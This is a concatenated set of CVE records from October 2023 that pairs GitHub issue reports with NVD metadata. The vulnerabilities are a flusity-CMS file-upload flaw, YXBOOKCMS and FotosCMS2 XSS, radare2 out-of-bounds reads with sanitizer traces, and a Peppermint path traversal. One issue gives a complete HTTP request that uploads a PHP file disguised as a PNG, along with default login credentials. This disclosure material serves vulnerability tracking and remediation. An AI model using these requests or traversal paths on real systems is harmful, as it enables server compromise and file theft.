After installation, log in to the backend using the default account password tester/1234 select files ![image](https://github.com/flusity/flusity-CMS/assets/113713406/c1be6738-5617-4fac-ac3e-3f2bb77a9cb9) select upload_file ![image](https://github.com/flusity/flusity-CMS/assets/113713406/8da3e39a-bf14-40dd-a0fe-16e1506f3a91) Intercept traffic packets, modify filename to a PHP file name suffix, and change the content to PHP code. ![image](https://github.com/flusity/flusity-CMS/assets/113713406/54b63469-b35a-41a3-8a7f-064c7b6ed9a0) ``` POST /core/tools/upload.php HTTP/1.1 Host: xxxxx Content-Length: 164075 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://fluency Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAY81e4VlxYZXQEi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://fluency/core/tools/files.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=k2l9ec3hfjhj2f19d5lml13qal Connection: close ------WebKitFormBoundaryiAY81e4VlxYZXQEi Content-Disposition: form-data; name="uploaded_file"; filename="a.php" Content-Type: image/png <?php echo "20231025";?> ------WebKitFormBoundaryiAY81e4VlxYZXQEi-- ``` view uploaded files ![image](https://github.com/flusity/flusity-CMS/assets/113713406/2a516fe0-335e-4941-8ee2-5761472b78e6) execute php code correctly ![image](https://github.com/flusity/flusity-CMS/assets/113713406/4fff6d9e-74f1-4181-bf35-2a7513afa23a) on line 15 of upload.php: ``` $allowed_file_types = ['image/png', 'image/jpeg', 'image/gif', 'application/pdf', 'application/msword', 'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']; $max_file_size = 5 * 1024 * 1024; $file_id = handleFileUpload($db, $prefix['table_prefix'], $target_dir, $allowed_file_types, $max_file_size); ``` It is not enough to filter file_types, you need to filter the file name
Unrestricted Upload of File with Dangerous Type in upload.php
https://api.github.com/repos/flusity/flusity-CMS/issues/4/comments
1
2023-10-25T12:24:31Z
2024-04-19T02:35:55Z
https://github.com/flusity/flusity-CMS/issues/4
1,961,299,199
4
5,700
CVE-2023-46503
2023-10-27T04:15:10.673
Cross Site Scripting (XSS) vulnerability in PwnCYN YXBOOKCMS v.1.0.2 allows a remote attacker to execute arbitrary code via the reader management and book input modules.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/PwnCYN/YXBOOKCMS/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/PwnCYN/YXBOOKCMS/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pwncyn:yxbookcms:1.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "5A5194B7-87BF-49C7-A090-CEEEAEDC077E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PwnCYN/YXBOOKCMS/issues/2
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "PwnCYN", "YXBOOKCMS" ]
**Product Name:** YXBOOKCMS **Affect version:** 1.0.2 **Case Address:** https://down.chinaz.com/soft/37726.htm (Program download address) https://www.ys-bs.com/ (The website address has been hacked) **Vulnerability Type:** Reflected XSS **Description:** The reader management and book input module in the background does not filter the input, so there is reflective XSS. ![3](https://github.com/PwnCYN/YXBOOKCMS/assets/147542481/d6f0b629-176c-4120-a524-c3ac0b2efcf7) There are no restrictions on readers and book names when adding readers and entering books, resulting in executable JavaScript code and reflective XSS vulnerabilities. ![1](https://github.com/PwnCYN/YXBOOKCMS/assets/147542481/fbc12546-ccb4-4d9e-ad75-9889340493c9) ![2](https://github.com/PwnCYN/YXBOOKCMS/assets/147542481/366b62cd-4713-4b5b-8ea4-41c43b61d82e)
YXBOOKCMS Reflected XSS
https://api.github.com/repos/PwnCYN/YXBOOKCMS/issues/2/comments
0
2023-10-20T13:54:30Z
2023-10-20T14:29:58Z
https://github.com/PwnCYN/YXBOOKCMS/issues/2
1,954,344,806
2
5,701
CVE-2023-46504
2023-10-27T04:15:10.723
Cross Site Scripting (XSS) vulnerability in PwnCYN YXBOOKCMS v.1.0.2 allows a physically proximate attacker to execute arbitrary code via the library name function in the general settings component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/PwnCYN/YXBOOKCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/PwnCYN/YXBOOKCMS/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pwncyn:yxbookcms:1.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "5A5194B7-87BF-49C7-A090-CEEEAEDC077E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PwnCYN/YXBOOKCMS/issues/1
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "PwnCYN", "YXBOOKCMS" ]
**Product Name:** YXBOOKCMS **Affect version:** 1.0.2 **Case Address:** https://down.chinaz.com/soft/37726.htm (Program download address) https://www.ys-bs.com/ (The website address has been hacked) **Vulnerability Type:** Stored XSS **Description:** The library name can be modified in the general settings section of the backend homepage. ![3](https://github.com/PwnCYN/YXBOOKCMS/assets/147542481/ee35a82c-0301-4cd9-bf7c-e0c790ee2eae) Due to the lack of filtering of input user content in the code, executable JavaScript code can be executed. As the modified part is the website title, the code will be triggered every time it is accessed, resulting in a storage based XSS vulnerability. ![1](https://github.com/PwnCYN/YXBOOKCMS/assets/147542481/ef7f4ce9-0d8a-4a62-9b55-734a93306f9c) ![4](https://github.com/PwnCYN/YXBOOKCMS/assets/147542481/739ef756-d607-4e43-b7cb-d3cb30ea7df2) An attacker can write XSS statements to obtain user information (cookies, etc.) that visits the website.
YXBOOKCMS Stored XSS
https://api.github.com/repos/PwnCYN/YXBOOKCMS/issues/1/comments
0
2023-10-20T13:09:52Z
2023-10-20T13:53:48Z
https://github.com/PwnCYN/YXBOOKCMS/issues/1
1,954,262,432
1
5,702
CVE-2023-46569
2023-10-28T02:15:07.583
An out-of-bounds read in radare2 v.5.8.9 and before exists in the print_insn32_fpu function of libr/arch/p/nds32/nds32-dis.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/afeaf8cc958f95876f0ee245b8a002e8" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/radareorg/radare2/issues/22334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/afeaf8cc958f95876f0ee245b8a002e8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/radareorg/radare2/issues/22334" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E042C08-7911-4974-A2A6-95F0EFD10809", "versionEndExcluding": "5.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/radareorg/radare2/issues/22334
[ "Exploit" ]
github.com
[ "radareorg", "radare2" ]
# Version ``` $ r2 -v radare2 5.8.9 31339 @ linux-x86-64 birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28 commit: b2de2288d8299f89288c503fc2ce22381b61aba0 ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` [35mWARN:[0m Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time [33mINFO:[0m Analyze all flags starting with sym. and entry0 (aa) [33mINFO:[0m Analyze imports (af@@@i) [35mWARN:[0m set your favourite calling convention in `e anal.cc=?` ================================================================= ==3834323==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f8504840958 at pc 0x7f8503865014 bp 0x7fffb6824670 sp 0x7fffb6824668 READ of size 8 at 0x7f8504840958 thread T0 #0 0x7f8503865013 in print_insn32 /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:1219:33 #1 0x7f8503865013 in print_insn_nds32 /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:1276:3 #2 0x7f8503865882 in decode /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/plugin.c:135:13 #3 0x7f8503362c85 in r_arch_decode /home/user/fuzzing_radare2/radare2/libr/arch/arch.c:320:9 #4 0x7f8501a629cf in r_anal_op /home/user/fuzzing_radare2/radare2/libr/anal/op.c:186:8 #5 0x7f8501a68433 in fcn_recurse /home/user/fuzzing_radare2/radare2/libr/anal/fcn.c:746:11 #6 0x7f8501a72172 in r_anal_function_bb /home/user/fuzzing_radare2/radare2/libr/anal/fcn.c:1558:9 #7 0x7f8501a72172 in r_anal_function /home/user/fuzzing_radare2/radare2/libr/anal/fcn.c:1696:12 #8 0x7f85057b4fff in __core_anal_fcn /home/user/fuzzing_radare2/radare2/libr/core/canal.c:857:12 #9 0x7f85057b4008 in r_core_anal_fcn /home/user/fuzzing_radare2/radare2/libr/core/canal.c:2077:6 #10 0x7f85054e8561 in r_core_af /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:4341:2 #11 0x7f8505507c00 in r_core_anal_all /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c #12 0x7f8505621491 in cmd_anal_all /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:12932:4 #13 0x7f8505537429 in cmd_anal /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:14267:8 #14 0x7f85063c3940 in perform_analysis /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:499:2 #15 0x7f85063b931d in r_main_radare2 /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:1720:4 #16 0x5629af31552d in main /home/user/fuzzing_radare2/radare2/binr/radare2/radare2.c:114:9 #17 0x7f8506029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #18 0x7f8506029e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #19 0x5629af257444 in _start (/home/user/fuzzing_radare2/radare2/binr/radare2/radare2+0x1f444) (BuildId: 655cd64f4959101bcf192e77bc6bf062577e0708) 0x7f8504840958 is located 40 bytes to the left of global variable 'mnemonic_mem' defined in 'p/nds32/nds32-dis.h:60:20' (0x7f8504840980) of size 344 0x7f8504840958 is located 8 bytes to the right of global variable 'mnemonic_br2' defined in 'p/nds32/nds32-dis.h:103:20' (0x7f85048408e0) of size 112 SUMMARY: AddressSanitizer: global-buffer-overflow /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:1219:33 in print_insn32 Shadow bytes around the buggy address: 0x0ff1209000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff1209000e0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0ff1209000f0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff120900100: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 0x0ff120900110: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00 =>0x0ff120900120: 00 00 00 00 00 00 00 00 00 00 f9[f9]f9 f9 f9 f9 0x0ff120900130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff120900140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff120900150: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 0x0ff120900160: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff120900170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3834323==ABORTING ``` # Reproduce ``` r2 -A -q poc ``` # POC File https://github.com/gandalf4a/crash_report/blob/main/radare2/r2/gbo_1219 # Credit ``` Gandalf4a ```
global-buffer-overflow in /radare2/libr/arch/p/nds32/nds32-dis.h:1219:33 in print_insn32
https://api.github.com/repos/radareorg/radare2/issues/22334/comments
2
2023-10-20T16:03:32Z
2024-08-15T06:30:02Z
https://github.com/radareorg/radare2/issues/22334
1,954,595,581
22,334
5,703
CVE-2023-46570
2023-10-28T02:15:07.637
An out-of-bounds read in radare2 v.5.8.9 and before exists in the print_insn32 function of libr/arch/p/nds32/nds32-dis.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/d7fa58f1b3418ef08ad244acccc10ba6" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/radareorg/radare2/issues/22333" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/d7fa58f1b3418ef08ad244acccc10ba6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/radareorg/radare2/issues/22333" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E042C08-7911-4974-A2A6-95F0EFD10809", "versionEndExcluding": "5.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/radareorg/radare2/issues/22333
[ "Exploit" ]
github.com
[ "radareorg", "radare2" ]
# Version ``` $ r2 -v radare2 5.8.9 31339 @ linux-x86-64 birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28 commit: b2de2288d8299f89288c503fc2ce22381b61aba0 ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` [35mWARN:[0m Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time [33mINFO:[0m Analyze all flags starting with sym. and entry0 (aa) [33mINFO:[0m Analyze imports (af@@@i) [35mWARN:[0m set your favourite calling convention in `e anal.cc=?` [33mINFO:[0m Analyze symbols (af@@@s) [33mINFO:[0m Recovering variables [33mINFO:[0m Analyze all functions arguments/locals (afva@@@F) [2K [33mINFO:[0m Analyze function calls (aac) ================================================================= ==3834464==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f0145244288 at pc 0x7f01442680a9 bp 0x7fff92e713a0 sp 0x7fff92e71398 READ of size 8 at 0x7f0145244288 thread T0 #0 0x7f01442680a8 in print_insn32_fpu /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:993:6 #1 0x7f0144261c25 in print_insn32 /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:1246:7 #2 0x7f0144261c25 in print_insn_nds32 /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:1276:3 #3 0x7f0144265882 in decode /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/plugin.c:135:13 #4 0x7f0143d62c85 in r_arch_decode /home/user/fuzzing_radare2/radare2/libr/arch/arch.c:320:9 #5 0x7f01422629cf in r_anal_op /home/user/fuzzing_radare2/radare2/libr/anal/op.c:186:8 #6 0x7f01460330ad in _anal_calls /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:9005:7 #7 0x7f0146030630 in cmd_anal_calls /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:9125:5 #8 0x7f0146022fc2 in cmd_anal_all /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:12982:11 #9 0x7f0145f37429 in cmd_anal /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:14267:8 #10 0x7f0147292940 in perform_analysis /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:499:2 #11 0x7f014728831d in r_main_radare2 /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:1720:4 #12 0x55727ae3552d in main /home/user/fuzzing_radare2/radare2/binr/radare2/radare2.c:114:9 #13 0x7f0146829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #14 0x7f0146829e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #15 0x55727ad77444 in _start (/home/user/fuzzing_radare2/radare2/binr/radare2/radare2+0x1f444) (BuildId: 655cd64f4959101bcf192e77bc6bf062577e0708) 0x7f0145244288 is located 24 bytes to the left of global variable 'mnemonic_fd2_cmp' defined in 'p/nds32/nds32-dis.h:155:20' (0x7f01452442a0) of size 64 0x7f0145244288 is located 8 bytes to the right of global variable 'mnemonic_fs2_cmp' defined in 'p/nds32/nds32-dis.h:149:20' (0x7f0145244240) of size 64 SUMMARY: AddressSanitizer: global-buffer-overflow /home/user/fuzzing_radare2/radare2/libr/arch/p/nds32/nds32-dis.h:993:6 in print_insn32_fpu Shadow bytes around the buggy address: 0x0fe0a8a40800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a40810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a40820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a40830: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 0x0fe0a8a40840: f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 =>0x0fe0a8a40850: f9[f9]f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9 0x0fe0a8a40860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a40870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a40880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a40890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe0a8a408a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3834464==ABORTING ``` # Reproduce ``` r2 -A -q poc ``` # POC File https://github.com/gandalf4a/crash_report/blob/main/radare2/r2/gbo_993 # Credit ``` Gandalf4a ```
global-buffer-overflow in /radare2/libr/arch/p/nds32/nds32-dis.h:993:6 in print_insn32_fpu
https://api.github.com/repos/radareorg/radare2/issues/22333/comments
1
2023-10-20T16:02:17Z
2024-08-15T06:31:10Z
https://github.com/radareorg/radare2/issues/22333
1,954,592,663
22,333
5,704
CVE-2023-5837
2023-10-28T22:15:08.630
A vulnerability classified as problematic was found in AlexanderLivanov FotosCMS2 up to 2.4.3. This vulnerability affects unknown code of the file profile.php of the component Cookie Handler. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-243802 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/AlexanderLivanov/FotosCMS2/issues/18" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.243802" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.243802" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/AlexanderLivanov/FotosCMS2/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.243802" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.243802" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alexanderlivanov:fotoscms2:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9153B8F-7372-4019-B2FA-6BB712EC9E6B", "versionEndExcluding": null, "versionEndIncluding": "2.4.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/AlexanderLivanov/FotosCMS2/issues/18
[ "Exploit", "Issue Tracking" ]
github.com
[ "AlexanderLivanov", "FotosCMS2" ]
On the profile.php page, line 20 will output, `echo$_ SESSION ['username '].' - Профиль';`, But`$_ SESSION ['username ']` is obtained through the` if (isset ($-COOKIE ['username cookie')) {$_SESSION ['username ']=$-COOKIE ['username cookie'];}` in the cfg. php file,`$_ COOKIE ['username cookie ']` is something that users can manipulate and can cause XSS vulnerabilities. ![image](https://github.com/AlexanderLivanov/FotosCMS2/assets/113713406/9ad2193a-4f8b-43c2-9fc7-5a92d3f08936)
The cookie parameter in profile.php has an XSS vulnerability.
https://api.github.com/repos/AlexanderLivanov/FotosCMS2/issues/18/comments
4
2023-10-23T06:12:31Z
2024-03-15T18:27:04Z
https://github.com/AlexanderLivanov/FotosCMS2/issues/18
1,956,426,373
18
5,705
CVE-2023-46863
2023-10-30T00:15:39.157
Peppermint Ticket Management before 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/users/file/download?filepath=./../ POST request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Peppermint-Lab/peppermint/issues/108" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Peppermint-Lab/peppermint/issues/108" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peppermint:peppermint:*:*:*:*:*:*:*:*", "matchCriteriaId": "E427CA89-5AC0-4D9B-9187-4579D200803F", "versionEndExcluding": "0.2.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/Peppermint-Lab/peppermint/issues/108
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Peppermint-Lab", "peppermint" ]
